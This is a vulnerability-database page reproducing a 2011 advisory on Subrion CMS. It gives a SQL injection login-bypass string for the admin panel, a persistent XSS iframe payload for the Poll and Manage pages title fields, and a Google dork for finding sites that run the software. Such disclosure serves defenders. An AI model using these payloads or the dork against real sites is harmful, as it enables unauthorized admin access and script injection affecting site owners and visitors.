Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SUBRION CMS Cross Site Scripting / SQL Injection

🗓️ 12 Jun 2011 00:00:00Reported by Karthik RType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 27 Views

Subrion CMS vulnerabilities: SQL Injection & Persistent XSS

Code
`  
1.SUBRION CMS multiple vulnerabilties  
vendor: www.subrion.com  
Author: Karthik R (3psil0nLambDa)  
Email: [email protected]  
My blog: epsilonlambda.co.cc  
Google dork: © 2011 Powered by Subrion CMS   
  
------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
Description about the CMS  
  
Subrion CMS unites the functionality of articles script, auto classifieds script, realty classifieds script, and web directory script all in one package. Subrion's highly scalable set of key features makes it a powerful   
platform for web sites.  
Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry level sites, mid-sized or large sites. You can be confident that you will be able to invest in this system and continue to grow it to any possible level.  
  
------------------------------------------------------------------------------------------------------------------------------------------------------------  
* SQLi Vulnerability  
  
The attackers can use the authentication bypass to get in to the admin panel in the site.   
  
Exploit: Username: ' or 0=0 #  
Password: ' or 0=0 #  
  
* Persistent XSS vulnerability  
  
The Poll module,Manage pages are vulnerable to persistent XSS in the title field.  
  
Exploit: "><IFRAME SRC="javascript:alert('XSS');"></IFRAME>  
  
  
* Products like: Auto Classifieds, Articles Script, Auto Classifieds, Real estate script, Web directory run on the same CMS, and hence are vulnerable too.  
  
------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
Thanks to side-effects for his valuable guidance and greets to taashu for her love and support.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Jun 2011 00:00Current
subrion cmssql injectionpersistent xssauthentication bypassadmin panelpoll modulemanage pagesauto classifiedsarticles scriptreal estate scriptweb directory
27